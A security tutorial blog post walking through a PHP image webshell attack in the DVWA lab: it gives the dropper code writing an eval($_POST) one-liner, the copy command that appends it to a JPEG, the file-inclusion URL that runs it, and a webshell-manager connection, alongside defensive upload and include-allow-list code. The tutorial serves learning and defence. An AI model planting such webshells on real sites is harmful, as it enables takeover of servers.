PHP Image Trojan Horse Steganography Method and Target Machine Demonstration

Foreword

Note: This article is for network security learning only!

In the previous article, we briefly explained the one-sentence PHP Trojan horse.

Previous article: PHP one-sentence Trojan horse @eval($_POST['hack']); statement analysis and target machine demonstration

Usually the defender also filters uploads by file type and size. For example, an upload form may be restricted to images only; even if the attacker renames the file to another type, it is blocked.

In that case we need a real image as a cover and use steganography to write the Trojan horse into the image so that it passes the check.

Image trojan

Steganography:

Steganography is the technique and science of information hiding. Information hiding means that nobody except the intended recipient knows that a transmission took place or what it contained.

The purpose of steganography is to use ordinary digital carriers such as still images, digital audio and video signals as a cover and hide secret information inside them. Embedding the extra data changes neither the visual or auditory effect of the carrier signal nor the size and format of the computer file (including the file header), so the covert information can be transmitted without being noticed.

The most common practice in steganography is to write the content to be hidden into an image in binary form.

Steganographic method:

First we prepare a normal image and a PHP Trojan file.

The code of the PHP Trojan file is as follows:

<?php fputs(fopen('hack.php','w'),'<?php @eval($_POST[hack]);?>'); ?>

Then open a cmd terminal and run the following copy command:

copy logo.jpg/b+hack.php/a hack.jpg

Here /b means the file is copied as binary and /a means it is copied as an ASCII text file.

The hack.jpg shown in the figure is the generated image Trojan.

If we open the Trojan image file in an editor, we can see that the Trojan code has been written after the end of the image data.

Target demo

We open the DVWA target range, select the "High" security level, and go to the File Upload module.

Then view the source code:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

We find that only jpg, jpeg and png extensions are allowed, the size is limited, and getimagesize() additionally requires the uploaded file's header to be that of an image. getimagesize() only parses the image header, however, so a genuine image with PHP code appended after the image data still passes all three checks.

Now the image Trojan we just made can be used. We upload the image, and the upload path is echoed back.
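Why the High-level check can be passed, and what a hardened handler looks like: the following is an added example (not DVWA's code and not from the original article) of an upload handler that, besides the extension check, measures how many bytes follow the JPEG end-of-image marker (a clean JPEG ends there; a file built with the copy command above does not) and then re-encodes the image with GD so that any appended or embedded text is discarded, storing it under a server-generated name. The function names (`trailing_bytes_after_eoi`, `store_image_safely`), the upload directory and the form field name are assumptions.

```php
<?php
// Added example, not DVWA's own code. Assumes PHP with the GD and fileinfo extensions.

// Detection: number of bytes after the last JPEG EOI marker (FF D9).
// Returns -1 if the file is not a JPEG at all or has no EOI marker.
function trailing_bytes_after_eoi(string $path): int {
    $data = file_get_contents($path);
    if ($data === false || substr($data, 0, 2) !== "\xFF\xD8") {
        return -1;  // no SOI marker: not a JPEG
    }
    $eoi = strrpos($data, "\xFF\xD9");
    if ($eoi === false) {
        return -1;  // truncated or malformed
    }
    return strlen($data) - ($eoi + 2);
}

// Mitigation: decide the type from the bytes, re-encode through GD, and store
// under a name the client did not choose. Returns the stored name or null.
function store_image_safely(array $file, string $upload_dir): ?string {
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > 100000) {
        return null;
    }
    // libmagic on the actual content, not the client-supplied file name.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);

    switch ($mime) {
        case 'image/jpeg':
            $img = @imagecreatefromjpeg($file['tmp_name']);
            $ext = 'jpg';
            break;
        case 'image/png':
            $img = @imagecreatefrompng($file['tmp_name']);
            $ext = 'png';
            break;
        default:
            return null;
    }
    if ($img === false) {
        return null;  // libmagic accepted it but GD could not decode it
    }
    // Random server-chosen name: the uploader cannot pick the file name or extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    // Re-encoding writes pixel data only; anything appended after EOI is dropped.
    $ok = ($ext === 'jpg') ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    imagedestroy($img);
    return $ok ? $name : null;
}

// Usage in the upload handler (form field "uploaded", as in DVWA; assumed here).
if (isset($_POST['Upload'])) {
    $tmp    = $_FILES['uploaded']['tmp_name'];
    $stored = null;
    if (trailing_bytes_after_eoi($tmp) > 0) {
        // Reject and leave a detection signal for monitoring.
        error_log('upload rejected: data appended after JPEG EOI marker');
    } else {
        $stored = store_image_safely($_FILES['uploaded'], __DIR__ . '/uploads');
    }
    echo $stored !== null
        ? "<pre>Image stored as {$stored}</pre>"
        : '<pre>Your image was not uploaded.</pre>';
}
```

The EOI check only catches the append-at-the-end trick; the re-encoding step is the real mitigation because it rebuilds the file from decoded pixels. Re-encoding is lossy for JPEG, so the quality parameter is a trade-off. Independently of both, the uploads directory should be served without PHP execution and its path should not be echoed back to the uploader.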

Then we use the DVWA File Inclusion vulnerability. Clicking file1.php shows the following in the URL bar:

?page=file1.php

We change it to the following to access the hack.jpg we just uploaded:

?page=file:///D:\phpStudy\phpstudy_pro\WWW\DVWA\hackable\uploads\hack.jpg

The page echoes the output shown in the figure.

At this point the hack.php Trojan file has been generated in the DVWA File Inclusion directory, because the PHP code inside hack.jpg was executed by include and wrote the file relative to the vulnerable script's working directory.
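The second half of the chain works because the `page` parameter reaches include unchanged, and PHP stream wrappers such as `file://` let it point at the uploaded image anywhere on disk. The following is an added example (not DVWA's code) of the standard fix: the parameter is resolved against a fixed allow-list and user input is never passed to include. The function name `resolve_page` and the list of includable files are assumptions.

```php
<?php
// Added example, not DVWA's own code. The pattern it replaces is, in effect:
//     include($_GET['page']);   // any local path or stream wrapper can be included

// Allow-list: the only files that may ever be included, keyed by their public name.
const INCLUDABLE_PAGES = [
    'file1' => 'file1.php',
    'file2' => 'file2.php',
    'file3' => 'file3.php',
];

// Map a user-supplied page name to a real file, or null if it is not on the list.
function resolve_page(?string $requested): ?string {
    if ($requested === null) {
        return null;
    }
    // Accept both "file1" and "file1.php", then look the key up.
    $key = preg_replace('/\.php$/i', '', $requested);
    if (!array_key_exists($key, INCLUDABLE_PAGES)) {
        return null;  // "file:///...", "../..", "hack.jpg" and so on all fail here
    }
    return __DIR__ . '/' . INCLUDABLE_PAGES[$key];
}

$target = resolve_page($_GET['page'] ?? null);
if ($target === null) {
    http_response_code(404);
    // Log the rejected value: repeated wrapper or traversal attempts are worth an alert.
    error_log('file inclusion blocked: ' . var_export($_GET['page'] ?? null, true));
    exit('Unknown page.');
}
include $target;
```

Note that `allow_url_include = Off` in php.ini only blocks remote wrappers such as `http://`; the `file://` wrapper used above is local and is not affected by that setting, so the allow-list, not the ini directive, is what stops this step.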

We open AntSword ("China Ant Sword") and try to connect to the website host.

The connection succeeds and the target host is under our control.

So far we have combined a file upload vulnerability with a file inclusion vulnerability, planted a one-sentence Trojan horse on a website host that only accepts image uploads, and successfully connected to and controlled the target website host.


Origin blog.csdn.net/BYZY1314/article/details/127809844